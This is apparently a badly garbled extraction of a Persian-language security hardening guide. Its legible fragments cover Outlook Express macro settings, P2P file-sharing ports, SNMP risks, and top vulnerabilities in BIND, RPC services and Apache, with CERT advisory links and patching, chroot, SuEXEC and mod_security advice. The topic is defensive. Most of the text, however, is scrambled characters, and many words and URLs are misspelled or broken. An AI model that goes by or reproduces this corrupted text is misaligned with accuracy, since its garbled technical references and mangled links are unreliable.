) X? 25 , @ ' ^ P , # ) #1 6 " •0 % ! " - Y K ?@ j : ("c ? F $, < 2t5: ?@ -, T +P 6h) ) W L3 / $ 5 5X % ' ("c ' • ? " $?@ ? 5 TG'" %P H) , 0 <( E " g ] , 1' ? ! ? , 6h) ) " 6% ' " ("c $ 5 5 X % ' " ,G b ' 5 5X ' $l 'h @ ] 0 5 - 3•_MY Documents 6% 'S #Y ] 5 O* N _ ("c 0 < 3 # ) #1 XSL % <, 0,6 ' ) # " - Y macro Disable I 6% ' / ' F # 2 ,< % ' * 6, • ("c # High , & ) - < HS @),, e G 7c L. : 6% '? 5 T G'" • - 56 5 5 X ) DOC • ? " $_Word I] TG' 0 < ' c ?!) 6 !89 DY/ W L3 6 0, 5 DY/ " ? 59 " K $O * (N (N 7 B 5! $h) ) @ ' 4 h) ) @ ' 4 ) , ,F 6% '? 5 V8 " ? 59 4 0, < ) 6 -,6 # ) #1 6 ? , ?" h) h @" ? 6 U) $O * Œ # ) @ 6 NY67 6 ) (E 5 j 4) @ ) 6h) ) " ) 5 5X @ 7 L 6 " - Y " %P H h) ) , Q% Q $7 , , 2 , ,F % 0, 6 )- 6 &'( L %H , / 6h) ) , , " %P H $Œ # n 9 " 6( @ ) 6h) ) $ 6( 6 I5 - ? 
@b 7 # $h) ) 6, I 5 0, BH $ P DY/ 6 & $ " ,G 0, 6% '7 L +F )O * , % < (N # ) #1Preview $ I 5 0, $ ' http://www.microsoft.com/security/protect/antivirus.asp0 5 - Y A ) # UW +Outlook 0 Express OutlookK Outlook Express j &'M,6 ] $l ' * " 2 3@ ' I 5 0_ c g] , 1' ?@ , ? G 6h) ) " " / ) N 6% ' ' 7 G', ' 3 2 _ O* 6% 'S #Y] F \) < : 5 O* N ) DOC 0,6 ' ) # macro Disable ) 6% ' / 0 - < " - Y ' ,< % ' * 6, • ("c # High , & F # 2 HS @),, e G 7c L. < - 56 5 5 X % '? 5 T G'" • # ) #1 XSL % <, • ? " 0_ ("c 0 < 9 l 'h @] 0 5 - 3•My Documents ,G b 5 5X 3 ?1 5 ) 6 BH ("c 5 X % ' , 1'? " 'Z _Word I] T G' 0 < ' c 6 DY/ W L3 !89 6 , 5 (N (N 7 B 5! h) ) @ ' 4 h) ) @ ' 4 ) , ,F 6% '? 5 V8 " ? 59 4 0, < $ ) -,6 6, I 5 0, BH 6 # h) ) K $O * DY/ " ? 59 " P ? @b U) ? " $O * @ 6 6 # ) #1 6 ? , h) ) I # +F , ?!) 6 &'( ) 6h) ) $ 6( NY67 6 6 ) (E 6 ) 6h) ) " I 7 L 5 j 4) , , " %PH $ ) 55X @ Q 7 , , 2 , ,F % 0, 6 )- Q% L %H , / 6h) ) " - Y " %P H h) ) n 9 " 6( @ I # @ )O * , % < DY/ 6 & 0 " ,G 0, 6% '7 0, A L (N # ) #1 $Preview . http://www.microsoft.com/security h @ " ? $ ' ) # 0 5 - Y /protect/antivirvirus.asp Outlook Express M, 6 ] 'Z " ? 7 G', $l ' " ? 59 * ' I 5 0_ c U '@ 6 )d * 7 L l' . 7 K &F " 6 @ I XP Security h @ " ? # 7 u ) Outlook ? 4 (N 5 ("c 0 5 - Y white paper Office # 2 $,< #P< ? , 0 < -, " Outlook ) X ) ("c " bP 7 5 I ) 6T5! " %P H I5 , ( N6 0 5 - Y Offece Product 0, 5 $XP U '@ * - < ) 5 ) 6 BH j &' http://www.microsoft.com/windows/oe h @ I5 0 5 - Y Updates page h @ " ? ^ UW + 9 Outlook Express 3 ?1 2 3@ Outlook 0 " * 5< , \89 # ) #1 6 " ( N6 ^ \X $ 7 K &F <@ 0, 5 - Y Resource Kit Office Outlook Express U) 6 ) # ) #1 6 ? 5 Uninstall I N W 3 ( ,H ? $ ? "), ) 6* ) 0 5 ? ME Setup - Y 7 !89 , -, • Outlook SL 7 ? 5 Add/Remove Program • Outlook ExpressSL 7 ) {† "), ) ) O * ) Windows " # ) " Outlook Express ) Outlook a 5 & " - Y Outlook D 7# Uninstall & ) Add/Remove Progtam ? # @ O * 0 5 6 ' ?@ MR/ ?# Outlook Express ? XP a 5 - Y • Outlook Express SL 7 ) pqqq "), ) ) " 6h @ " 9 7 B 5! 
, `4 F Outlook Express Version 5. X/6.0 * h @" , - Y , " pqqq "), ) ? 5 … - Y http://support.microsoft.com/default.aspx?scid=kbEN-Usq263837 0, 5 Outlook Express Version 5.x/6.0 * h @" , - Y $, " ME 5 ) {† "), ) ? … - Y http://support.microsoft.com/default.aspx?scid=kbEN-Usq256219 0, 5 R4 S @ : 2 5 Wimdows Peer to Peer File Sharing (P2P) 6 ' ?# 2 ) 0, < ' User mode I " , H- Y ' $ K, ) " ]- 2 l' 6 h -, " - 3• >' I 4 -, ? G? , 6- I N 6 #P< " % ' ' ? , ) SB g -,< K 7 < & ? " ) +" 0, 5 ) 6' )d* < 3 )V# $ 6% 'V < 2, U) ? N - Y Q " - Y H? , I5 l ' 6 code Source Napster b 6 9P T " \ 2 - Y _ /) 6 , 5 6 2 H U) 6 +" ) Download )Y \ 5 <2 I 3 ?1 7 L SB g l' 6 " I ! B B 512 U) ?# 1 &5 ) ,< d l ' R4 S @ : 6 n 9 " -, < 1P 0, 5 ( 7) Y -,< - < ^ P ) -, 0 E F 6- E F U) I &' 6% ' , )- ? 0, R V < 6% 'T )?@ download 2 , 7 5 „ 1# 2 LAN ,63 L ? 6 F 1 ), 5 ) 5 0 5 ' $ 6% 'T F) & WAN 6 H ,F , , ) S @ e G (E U) '/ < \ N 7 4" - Y K - 1% I l' \P < ?# W 3 6 P2P ) (E 6% < , 67 4 " X / I5 ?@ http wrappers " - Y " - Y ) E F ^P 0,< ( ,H ? " ?56 - Y e 'j 4 I ), . ("c 78 I ^P , @ ' <] -, I 0 ' , 6 3 -, 6 #P< 0 < ,6 3 % < I _-, Q 0, < ) 6 ' E F 0, 5 upload 2 , l ' 6 -, < T 5! 3 ? &56 : , . 2' T/ v 4 6 6 ? " i: multithread / ) j &' " - Y ? " 5 "E g DOS \ " 85/ ;! , ) _P2P -, U) 7 !89 23 , - 9 * F) 0 < <R V < ,F : < _… ) F) & ^ 6 &'( $ \X ] L $ 2 , #4 : _ % < P2P $ " ]& B'\ l '7 , , 0 ' =GX % 1 , ] #P< ),. H %K N` 6] : 2 0 ] 7c L. -, 6 K 6 n 9 " -,< K 6 \ 2 " ? , . 6 _ , <b . TP - Y )_ ) B' 0, 5 F +. / % ! _0 F 6* 5 -, < < "), ) ) F) & U 1) U# ^P SL % ! 6 ,G ^ 0, < 3 W 3 j1 #P < ) P2P a " \ 2 b -, < - Y T) , 6 5 - Y "), ) 6* : 2 P 1 & ?@) < 0 &'( )3 5 678 6 " - Y d * 4 4 ) " 6* ] ,, 2 e G !" ,6 3 TP, P2P ? I5 0 1 !" " : #P< ' y 2 < • 6 6 b C 5! application layer strings ' E F• - Y P2P 0 -, < download . T I #P< " - 3• 6? # _exe, mp3, wma, avi, mpg, mpeg, jpg, gif, zip 0 "@ 'D j6 #P < " (E )Y 7 B 5! 6% '] - 3•Z>'y &'( )$,% $l ' R 4 S @ : % % • b • 9:; 678 DY/ I 5 a ? " ? 
H ) dowmloading 6 ^P | < " - Y • T G ? " ? " g 6 " - Y - . . #P< 6- N ^P " - Y • T G ) #P< " • - 3• >' 5 0" E $@R= 6 &'( C L3 &'( SL H 5 8 • 15G ? 0, < P2P T P2P 6 b I ) 4 -, 6 U ) " - Y • -,< - Y 67 4 _ ) ) | F) 3] y P2P ^P ' 0-,< ( N h) ) 2P2P 0 1$ B'• • C L3 #P <y @ 6 &'( " ` 7 6= 6 :! ") - Y • ! 0 1G 7' _••{{ $††}Š $†††† - 5< TCP 67 4] Napsster • _‹••Š $‹••p $‹••w - 5< TCP 67 4] edonkey • •s‹} $•s‹• $•s‹Š - 5< TCP/ UDP 67 4] Gnutella • 6- 5 < TCP 7 4]Kazza • TCP/ UDP 7 4 ) www wp‹w - 5< &'( )$,% * #1 Simple Network Management Protocl (SNMP) -N 5 SNMP " - Y 784 2 ) , , #4) ) - " y #4 I 5 ?@ " # SB g $T 0 < 1 )$ I 5 SNMP %# ) 4 " - Y TCP/IP - Y P ' 4 #P < 7) Y 6 6( ' - ) 6Access point $ 6ˆ K $ 6 ) $ N4 ' 0 < SNMP , 6( 4 ^ 6N 3 2 ( 4TP B % , 6- N $SNMP -, < - Y b o F & $ SNMP N& S ^P % < 0_, 5 - Y ] #P< ) 3 $l '7 !89 " - Y Q 0, < R4 S @ ^ ? 5 SNMP u - 5< * $SNMP 0_, * L3 7 L _U ) 3 ,K B! " ,G b R4 S @ ^ < $h _?@ / X ! 6- ' ) !89 -,< %L 3 M,6nH ) S -,< K 6v 6( 4 , K " $SNMP * I5 j ,4 ] < TP, P " - Y 6N 6N O* H e 'j 4 7 L ? , 6T, " - Y - 5< * #4 PG ) , K R4 S @ ^ 3 , G ) T G' SNMP ,G " $SNMP ) ) ,1 " I5 7 K &F SNMP 6( 4 " < 0, < R4 S @ ^ , ) , ) 7 !89 Z ', 2 5F ) H $l ' R 4 S @ ^ - Y SNMP 3 785/ & c L. $ N #4? bP R4 S @ ^ 6* 5 i: j &' I 5 ? , 6N SNMP 6A) " - Y (,! 0, 5 ! N " $ #P < A) " [ P e 'j 4 A N 0,< 6 0, < 3 gV " PG ) , K (& # ) -,< 1P ^ P SNMP 5 , H ? G -, < & < ) 6 3 7 & E ) 7c@ 2< ] V ^ - Y 6A) 6( 4 6A) " [ 0_78# , 6A) 0, 5 -, < - Y , 6A) " $SNMP )Y " ] DOS \ " 7) Y 785/ ( E ? ' 0, < I5 $qs …pqqp CERT – h @ R4 S @ ^ 0 5 -,6 0 6N ! B 5F " $ 6( 4 " * ] SNMP - 5 _ - Y $ #P< y I 5 -,< - Y : I K 6N H , 5 6T, " - Y 6A) W L3 ,1 K ]0, < ("c , U) ? G SB g )0 2#5 #P< , 7c . A) SNMP0, < Point 6- N U 1) U# -, < d * 0 3 $UPS 6N ^ ) $ 6 N4 , 7) Y /f =GX % 1 , : 9P Bridges ) access % ! 
P 785/ &1@ " % #4 B5# I 5 -, < - Y SB g SNMP " 0 #P< 7 & E $ ) SNMP , , b ) Windows Service (&B SL 6* $SNMP 6 SL $ #P < ) 6 7) Y embedded e 'j 4 7 L $SNMP 5 TG'"), ) F 2 6* 0 < - Y 785/ Q 0 +. / * SL Q 0, < - & - 5 "), ) % ! 0 1 !" 6* 5 T G') SL e 'j 4 7 L l 'U ) SNMP l ' R4 S @ : P 5 CP 0, -,< K W L* #P <% ! 6 0 < ,6 3 !" $ #P< -, < % L ) F 5 $SNScan N 4 6N ) 0 5 - Y . Foundstone. http://www h @ n 9 " " - Y ? # # 0 SNMPZ F ) SL W L3 GF ? ^ % ! T G'd * -,6 ) " - Y SL ) "b 5 SNMP SL I5 A) " ? ) #5 ? ? <" 67 # n.7 a < ,6 3 - "2 Com/knowledge/free_tools.html ' $ 2 netstat w•p ) w•w ) 0 &'( )3 45 678 I 5 ("c 7 B 5! $SNMP " b3 ) 6- N H,, e G ?@ ? ("c 7, U# , 0 KF 0 (E ( E 2 6& 7 L - 4- ." )- @\X 4 ) F) N 4 6 @ " U4 (E 6U ) SNMP E F) 7 B 5! 2 netstat-an H,, )S @e G $SNMP -, < - Y ) e 'j 4 SNMP Community ] 13 F) _ P ! h,/ % H SNMP Community F) Community SNMP Y* F) 6 < &'( )$,% DY/ 7 ,H ? 0 5 ") % 9:; 678 $l ' R4 S @ : % DY/ I 5 6, " 26 A + D ( )0 1 I 5 $SNMPv3 ) 6( 4 , K 7< % P T, " - Y _?# 7 Patch * 2 3@ ? $? , $) ) , 1 7 L* " w•w 7 , 4] , K5 0 K6 ),. agnt b ^ b agnt 6@ B' #P < (E 6 % ! SL $-, ) ) P $ ) 6- ,1 b 3 , ? & P A R 4 W L3 T ("c T P !89 y SNMP 3 3 6N " ? 6* B'T) ' " - Y 0 ? 5 V8 w•p 7 4 ) 2#5 l ' J) 0 $?@ " ,G ) pqqq"), ) 6 9 F) F 3 7 L l '7 B 5! ? 6 -,< K SNMP B SNMP agnt b 6 6 N& SNMP " - Y 7 * l '7 B 5! 0_TCP/UDP ) X # - Y SNMP agnt ] 6- $CERT Advisory CA-2002-03 5 5X j* 0 5 GF TCP/UDP 9:; SNMP ? 5 TG' g ?@ " - Y 7 ) X (,! 7 [ 6& ? G ? 1 ) $,< Q 0 (E ( E IPSEC & ?& B' ) 0 < +H ) c ; ?@ " - Y 7 ) X (,! 7 0 1$!= % 9:; SNMP ? 5 TG' g I 5 $SNMPv3 ) 6( 4 , K P T, " - Y _?# 7 W 3 " 2 0 ) ) 7 $) ) * SNMP " - Y 7 P! L )- h,/ % H g , O* 0, < )" @ W L3 3" ? N& 6& ? G -, < - Y ] community - Y _ ( #. ] 6- ("c : 2 0 I5 N u& ("c "W 3 P F 7 # " - Y (E P ! 6& $http://www.sans.org/resources/idfaq/snmp.php h @ 6 ),. -,< ' -, < K 0 b) w•w 7 B' #P< ) ) 6- l '7 B 5! 
0_TCP/UDP # #40 4], K5 (E $-, < & 5 $ , F) F 3 7 6subnet 2 SNMP " E ' B I & - Y SNMP 9 w•p 7 4 ) TCP/UDP L 6N , I5 C ' ) X y # B' , 0, 6 ( E U M f7 - !" R4 S @ ^ 2 U 1) U# $ % !" 1 23 4 0, <P 7 !89 " ) 0 ) %K 25 : -, < =! > ?@ 56 $ 5B !C 8 ? , ) 5L M 9 A 'D (E ! 5E 2' /) F &1@ 6 GH ) 5 2' H? " ?@ P 4) " R4 S @ ^ 3W 3 P B 9 F) % 1 , ' ?5F ) - 5 - Y -,< 3 < $ 3 M ,6 % , , N ?# - ) 6? " & 5 ?5F ^ 2 " S @^ N &1@ ) S 6@, 5 D Y/ c ) [ 3_ O * 7 < \ R4 S @ ^ ) 6 Y/] ) X F 78# " V, ,G 6A) 2 , ,3 %K " 6 O * M,6? G Cod Red ) % ! 7 !89 ? @ > GP 8 $ B I 6 ? Q 6U ) 6 & $ ?5F 0, 5 ) 6( I RN6 2 #P < E ) 6 " - Y Z I N ) ! Y 785/ T) , % ! =GX ^ N` 6?), ) - # M 9 ( &@ I J 0 ,G 6 - 6 O* I 56$ % ! -") P % ! : ), F 7, , , - . 6; . " - " M 9" ) , < % ! @) &' * + # $% ! 6 R4 S @ < b R4 0, < ) U# R4 S @ ^ F) B !$ ) 2 R4 S @ ^ R4 S @ d * N 560 " ,< ,6 3 K 6 'G " U4 2 <) , , e G % ! $ R4 S @ ^ " 6% c 3 6 ! 5E 4 63U $ 1 =GX N 4) B - . % ! 6 R4 S @ ^ -, " ) <@ ? @ ^ &1@ ) ! ? " F) " [ < )@ 785/ ) 7 , , SB g $, 6 '?5F #P <) F ? , " ) 4 , 1) $ - < ?@ R4 S @ ^ " % ! 6 S 0 3 =GX I bP - ? F i: 0, 6 ( E ) - < ("c 7 ,H ) 6 F R4 S @ ^ ("c 6%5G1 % < B5# ) , Y 7 !89 6 M @ 7 &'( )Q% * - Y G ) i: " - \ 785/ F -, 5! -) - -") K6 F - ? F 2 5F , 5 - Y % ! U# R4 S @ ^ b f % ! " , G 785/ ? ? G _7) Y 2 ? + # $U# 0 6 * ] U# $ -,< ( E - ) a- 5 BIND Domain Name System Remote Procedure Calls (RPC) Apache Web Server Generl UNIK Authentication Accounts with No passwork or weak passworde Clear Text Sevices Sendmail Simple Network Mangement Protocol (SNMP) Secure Shell (SSH) Miscon figuration of Enterprise Services NIS/NFS Open Secure Sockets Layer (SSL) BIND Domain Name System ) - $ (Berkeley Internet Name Domain) BIND &'( h - Y DNS_Domain Name ] " BIND 0 / 5 IP h @ _http://www.srco.ir/ a #P < \ " C L3 $ 785/ ( E ( E ?@ I5 S ^P 1 ) $, - - 4 # (E ? ,6U) M,6 0, < R4 S @ ^ ) -, , !" #4 DNS T# < ") BIND K6 j CA- CERT 785/ N " , 5 dOS \ K : l 'F 6v 4 T " 0 H ?@ -, ) - Y DNS ;! 
BIND -, 6 U ) Dos \ " F >/ 0, < R4 S @ ,G % Z #4) W ZF $ Dos \ " F B 5F " 0,< " F ! L3 ) X ", Cache < TP, ^ -, < = 7 K &F Advisory2002-15 H Overflow \ " 3 : Resolver + ^ ") < " - 4 F ) DNS 3 2 $ 3 7 K &F ", F) : 5F 2 6 ' l ' R 4 S @ : " - Y Z ?# $ - *1 , ,, 0 5 " ,G " 6 N ") 2 0,6 <R " R4 S @ ^ , CA -2002 -19 CERT Advisory 1 0 " F $ " $l '785/ K6 3 # 1 0 E ? & ) 9 785/ 5 $ 6% 'S : ? ' I5 ? , $ 5 ,H ) Buffer Overflow =GX ?@ ?5F < TP, , L Bind deamon ? @ ) l '% ?@ " - Y -,< ? G ? 5 M 9 ? , ("c 6 @ (, ! a, * 0 (, ! ) DNS U ) <8 BIND ? , )- F I5 785/ ) O * _Dos] Denila of Service ! 6U ) g7 % ,P I / - N F ) BIND " - Y ?@ 0, - I] ? & - 4 , R4 S @ O * /) N ?@ " ) - Y l ' GX) " ? 5F - Y @ , 6 6 @ ?), ) 1G' I 5 2 3 PG g 0 #P< 6- '784 ? G -, 6 U ) F " ?5F 0 R4 S @ - 5 U 2 , 0, 5 - 3O * ,6 3 BIND " SL ?@ ) * 1) U# Ž6, 6 U ) 1 & S 2 +. / , -, < K BIND " * # 0 1 !" 6 5 C P ? G? & , #47 0,< ,6 3 !" ) ) K % ! BIND " - 5 6Patch 2 3@ " - Y K ? 59 BIND * ?@ " " - Y 7 5 % S @ T5 / $,< -, Patch % , 6 3 j 5 X.Y.Z 7 Level Patch ) ?@ ) " ?@ ? )- , N 2 3@ " H 0 Symantes -,< ( N N 4 - Y & $ * I " ? R4 S @ ^ d * $ 4 " BIND bP -,< F) R4 Y$ B -,6 X * N 4 2 3@ 0 5 SL # 5 ' 2 ISC >! $ BIND 6-) 0 I 5 DNS R4 S @ ^ * 2 3@ $ 6, 6 6 &'( )$,% a ) W L3 F P 3 / -,< SL BIND * 7 K &F -, 6, 6 #) " -,< 0 5 % 0 < ,6 3 Version 9.2.2 v 6 @ ,1 b 2 3@ SL " -, < K BIND * N -,< SL X !] -, 5 ,H ) Z) * ISCb bP $ Q L -, 6, ' )- 6 7 BIND # ^ : ? (N / ? 59 BIND * ("c 7 !89 v named a 0 3 * ( E _-, gInternet Sofward Consortium :ISC SL BIND # 0 &'( )3 45 678 % % nH 9:; 678 DY/ I 5 ) • l89 & named ?@ ] BIND deamon ? 5 TG' g _ N 4 I 5 0, -, BIND &'( ' ? DNS -, 6 U ) I ? G _?@ ,E ? 5 TG' I ] W 3 7 K6 u 3 0 5 MR/ 6 )? , ,1 b 6Patch -, 6 U ) -,< K B5# 7 !89 ' 0, 6 Z Checklist j* ) CERT " * N (N 2 3@ " BIND -,< K 7c T5! " ) " • I5 ?@ ?# 7 2t 5: SL : 0, K5 - Y $ UNIX Security Banner ^ g * j 4 ) 785/ ? 5 BIND GH ) * - 5< -, ` 4 ) MR/ BIND " • I5 Version String 0, K5 2 &N F _ named DNS servers) % ' DNS [? 
, 6U) Zone 7c Zone 7c C ' T GH ) • ?# ? # _secondary DNS servers], K5 6 'Domain ^P Child ) Parent ^ P ? # " % ) T G' g 0, K5 - Y _Forwading] y #B 5! % DY/ 6 Domaion R )] Delegation ) ') _ 1t • glue fetching ) Recursion ? # I5 0, K5 TG' g DNS Cache i . 5 ? H . ) named" " - Y [ non – privilage : ? G BIND 2 Privilage h @ " BIND 9 - 5 < * DY/ , K5 ),. • I5 BIND $ Z F Chroot 0 0, K5 - Y http://www.losurs.org/docs/howto/Chroot-BIND.html h @ BIND -, < = R4 S @ ^ bP ) 3 785/ % DY/ I a 5 - Y h @ " ISC BIND 0 h @ " ISC 0 : Dos R 4S @ " ? : • - Y http//www.cert.org/advisories/CA-2002-15.html BIND - Y 9 "+ 8 : DoS R4S @ : 2, http://www.isc.org/products/BIND/bind-security.html • 6 ) BIND 25 SL I 5 ("c 7 4" - Y ) 6@ ) Running the BIND 9 DNS Server Securely a h @ " ? 0 5 - Y Afentis h @ $U c -,< K 7c <@ Remot Procedure Calls (RPC) K62 ) F H B 5! - N F F 0, < U) ( E K I " )- T n 9 " () ?@ " - Y RPC - Y NIS ) NFS % 'V < $ ) - " , I #P < -,< +" 6 ; G RPC ,G 6=GX F) 6U ) Q RP @ ? 5F RPC 6" E 6 " - Y T % ) ) 1999 T RPC ,G RPC " - Y 6 T) , I ?@ " f F )- T 5G ,/ " j 0, ) H"E @ =GX S DoS \ " 785/ Q R4 S @ : ) : %1 , $ # g F I F) & C 3 0 0, i: & @ ' )- y 6, -,< = - \ ' 7 ") 785/ 8Q RPC 6U ) RPC DCOM ;! "), ) ?@ ) U R4 S @ ^ 2 +. / -,< SL RPC F 2000 ^P : # ZF 3 M ,6 K6 - ( 2, , 0, < , 6 3 =GX 6 -,< YB* 785/ 0 1 !" 1 ) U# 6* 5 0, < P , , e G !" " # Z F" ? $ rpcinfo" a, RPC Program ) - @ R4 S @ ^ ) &'( )3 45 678 N 4 " - Y RPC T) , 6U ) RPC SERNIS Number 100083 Rpc. Ttdbserverd P! Rpc . cmsd 100024 Rpc.statd 100005 Rpc.mountd 100232 sadmind 100235 Cachefsd 100249 Snmp Xdmid buffer Overflow 785/ n 9 " C 5! RPC H- Y Z 6- 100068 ) 6:3 W L3 ' ) ("c ? # 2 $ Buffer overflow R4 S @ ^ _O * , 7 L SB g] j4% H ) Z:3 : , <P -, " b RPC , 5 F , 5 T 6U ) l ' R4 S @ ^ " " ,G # " & @ 0, 5 - Y 4 ) X RPC " 6U ) " K6U ) : I'/ ?) 1 - $- . , 5 " Z F T 5G ,/ " j g 6 ?# , % P% 9:; 678 DY/ I 5 • 6MR/ ) ? 5 TG' g 0,< F) ? @ MR/ ?# $ Z F% ! ) - " )"E RPC ) ) 6 'F F &'( )$,% a B ! 
0, b ' F ' - Y , 6' 2 6 , B ) h / K6?# O * , Overflow & @ 1 " E RPC g- F =GX 4 - Y ( E ,! 6U ) 5 #P < ) ?@ " • -,< K Patch 2 3@ SL a 0 - Y _http://sunsolve.sun.com ] h @ " U c http://www.ibm.com/support/us 0 a h @ " IBM , &'( AIX - Y http://techsupport.services.ibm.com/server/fixes) ) http://www.redhat.com/support/errata a h @" U 0 7 L http://www.debian.org./security - Y Patch 2 3@ SL ) 6 @ 9 1 I5 E F7 B 5! 0 <( E 5 135 7 4 ) RPC portmapper 0, 5 V8 T) ' ) UDP ) TCP , K5 V8 $ l ' J) " 785/ 5 % 785/ " 3 B ^ 32789, 32770 Loopback 6 DY/ windows ) i: ^ B! _ UDP ) TCP] 111 7 ^ ) F c $ KF F [ g B! , g 4 5 4 4 _UDP ) TCP] 67 4 ? 5 TG' " - Y 0, 5 5/ 1 ) - PBuffer overflows 0 TP " %/ NFS % ' 6 $ , ^P a 6 P IP/ ? & " - Y 1 , 3 b'7 L R4 S @ ^ - Y " 6h @ " ? RPC ^ % ' 6 j 4 : , #4 nfsbug" " - Y B5# 7 !89 R 3 a 5 http://www.cert.org/advisories/CA-2000-17.html|http://www.cert.org/advisories/CA-1999-05.html http://www.cert.org/advisories/CA-1997-26.html http://www.cert.org/advisories/CA-2002-26.html http://www.cert.org/advisories/CA-2002-20.html http://www.cert.org/advisories/CA-2001-27.html http://www.cert.org/advisories/CA-2002-25.html http://www.cert.org/advisories/CA-1999-08.html http://www.cert.org/advisories/CA-2002-11.html http://www.cert.org/advisories/CA-1999-16.html http://www.cert.org/advisories/CA-2001-11.html http://www.cert.org/advisories/CA-1998-12.html http://www.cert.org/advisories/CA-2001-05.html http://www.cert.org/advisories/CA-2002-10.html http://www.cert.org/advisories/CA-2003-10.html http://www.cert.org/advisories/CA-2003-16.html http://www.cert.org/advisories/CA-2003-19.html Apache Web Server 0 ) 5 O) ? , 6 U ) 78# (A-2002-,CA-2002-2717] - a 3W 3 R4 S @ 6 ' " 7, , F) & PHP ) CGI 0 bP ! h / 6- ?@ ) _DoS] U ) -)8! 6 „1# & O) -, 6 U ) " $?@ 4@ ? `56 1 ) < R4 S @ ^ R4 S @ ^ F) 7 # _Apache] O) -, 6 U ) 4@ , ) 6T)„ 3W 3 R4 S @ ^ " 4@ $ _IIS] ' # ) %K 0 6=GX 2 1 ), 4@ -, 6 U ) ? 5 TG' g ) 6% '2 3 , - 9* )j 5 ) - " -, 6 U ) _ 3) # ] -, 6 U ) ? '- 9* +. 
/ ,G ) e '7 L 4@ $l '? # , 5 - Y "), ) 3 W 3 R4 S @ ^ 4@ 0, <P -)8! 0 4@ Z F SL $ U I =B* B! , & H U# 6 1) U# " 4@ 0 1 !" N 6* 6* & ) 5 " " ? " \ 2 0 5 SL & 0,< !" 4@ SK-, 6 U ) R4 S @ - . W L3 ("c 7 !89 S a 5 - Y h @" ? 0 &'( )3 45 678 " 6@ I5 6h @ " ? $ Apache 1.3.x : • http://www.apacheweek.com/featurity/security -13 h @" ? Apache 2.0.x | http://www.apacheweek.com/features/security-20 • R4 S @ d * ah @" - Y - . I 5 ("c 0, < P '7 !89 G X) Z W 0 "2 ,Y $-,< - < 6h @ ("c 7 4) L3 & http://httpd.org/ &'( )$,% a K "7 4$ % 9:; 678 4@ O) -, 6 U ) DY/ I 5 • -,< K patch 2 3@ SL " ? 59 " 6 @ http://httpd.apache.org h @ " ? I5 : 2 0 5 - Y levels Patch ) 6 * h @" ? $ 4@ Q code Sourde 6* 6Patch 2 3@ -, < K I5 http://httpd.org/download.cgi 0 5 - Y h @" ? GX) 2 3@ ' ) 6 @ I5 0 5 - Y | http://httpd.org/dist/httpd/patches/ " ? $ 4@ 6* code Q Source I5 0 5 - Y http://httpd.apache.org/download.cgi h @ h @" ? 6Ptch 2 3@ -, < K 0 5 - Y - Y ? @ " +F ? G #B 5! mod . I 4@ ( R4 S @ ^ " ("c : ("c 0, - "2 % 5 2 4@ ) ) $ I 2, ), ) X 6-" .ZF 5 _CA-2002-27] –ssl % - 5 - Y SSL O F$ ? G 4 E " E %H ,/ W 3 0 4@ 0 < ,6 * $ chroot Login 8Q 0 C / 0 ) - Y •|• G', c 0, 5 $ -, 6 U ) 0 6) I5 ! patching " ? 59 ,B 6T)„ C ' - < # 2 Open ) 6 @ http://www.apache.org/dist/httpd/patches/ % ! ) X ' F" l '-) ,E = G ;! B 4 Chroot ) •ROOT , E = G;! ? G, Chroot 0 session F 6% ' 5 -,6 F W L3 H $, 5 , 4 6 ),. $ l ' ) E $ /chroot ( U) 4@ ?@ F 3 G', - <& S I 5 O) -, 6 U ) 0,< &'( 0 - Y ) 7, F 3 * " 9 1G'W L3 , 5 3 0 ' # ("c ?@ K loggingW L3 '# < ) [ U) : 6% ' 6 '? @ a 5 - Y g ' 6T)„ I ) , " S ?@ I5 B "+ " , 6A) ? G$ I I5 ) -, 6 U ) g ) R3 4 ) 6 BH $ logging 7 B 5! H )"E B' ,G ("c 7 , 5 ? @ &1 @ 6% 1G'\ 4@ -, 6 U ) ("c 2 6 0, 5 ?# 4 , ?# S •c 7) Y 2, 0 6 6 6U) , F 7 !89 " W 3 I ) •c !89 !89 +P 2#5 W L3 3 4@ Chrooting ("c O) -, 6 U ) R4 M :G 7 L c 4@ -, 6 6- Y Z W L3 F) chrooting -, 6 U ) F %K 15 / ) K W L3 6 ,' 5 F) chroot " z 3 ) % ! + P ) < 6 #6 6U ) ?# $, 5 " g@ P F7 [ , 9P 3 0 5 Z F chroot b. ?@ b. 
< TP, " H /chroot/httpd ("c 0, 5 6 ' B : ) F & 7 2, 0 < , 6 * ^P ,6 * I 6j* # 2 CGI,PHP 0, @ 4@ # F c 2 0 1G') Z F chrooted 7 L '# -)8! 0 W 3^P > P l' S ),. : 8Q 0, C 5< ' 6 '$-, 6 < K<@ (E < @ •c I 5 0,< ,6 3 http://httpd.apache.org/docs/logs.html h @ " Apache 1.3.x 0 <- Y http://httpd.apache.org/docs2#5 -, @ j 4 b < F h @ " Apache ) )Y 2.0.x 0 < - Y 2.0/logs.html ) CGI , PHP " # ? ) •c < P [ l ' GX) 0,<P ' ,, $ ( ,H $ - Y Œ # =GX POST ) GET W L3 S j< 4 0, 5 6 'O) 6% ' ("c &1@ ? j &' I 5 ) O) -, 6 U ) - 56 l ' ^ P 0, 5 6 _detection Intruder] 25/& N 4)- 6 ^ mod_Security n 9 " , R 47 6 . 6 „ 1# 7 B 5! ? 5 •c 0 5 POST ) GET bP O) P " - Y Z ) F ModSecurity d * •c F 5/ 0, 5 " K N 4 F " $ ModSecurity 4@ -, 6 U ) -http://www.modsecurity.org/ -http://www.securityfous.com/infocur/17064.152.44.126%20152.44.126 a # 4 N ], Z " 5 T G' g I5 ,! # , 5 F 2 6? " 0_,< < F 6 ' Apache User Id H , 5 6 ' User Id F : ,F ) - Y 7 #B 5! - . K<@ , - 5 - Y 4@ . 6 ? # 2 SuEXEC 4@ ? . CGI ) SSI ) 6@ P I5 ) : 2 a 5 - Y " / 6 2 , 0 , < O) -, 6 U ) L 3 CGI )SSI -, < < ,< ("c j 3 $ setupid Root $ User Id % b " - Y ) X # 7, , S 0, < , 6 3 MR / $ ? 5F ) X SSI ?@ ( &1) -, 6 U ) P 7) Y User Id " - Y - Y ) F) ? @ ) PHP,CGI,SSI " F ) 2 < ?# ) j6 ;! ) PHP,CGI,SSI F ? # $ SuEXEC 0 < - Y SuEXEC " 3 'P 9 ") ) SSI,CGI,PHP # Server Side Includes 3 , 6? " 06 # ", 0, K5 TG' g # : SuEXEC ( 3 <) S 0,< ,6 3 N 6h @ " ? 6 , # 4 (,! 6- Y/ SuEXEC " http://httpd.apache.org/docs/suexec.html h @ " Apache 1.3x 0 <- Y http://httpd.apache.org/docs- h @ " Apache 2.0.x 2.0/suexec.html 0 <- Y ) cgi- bin 6 0, MR/ $ 5 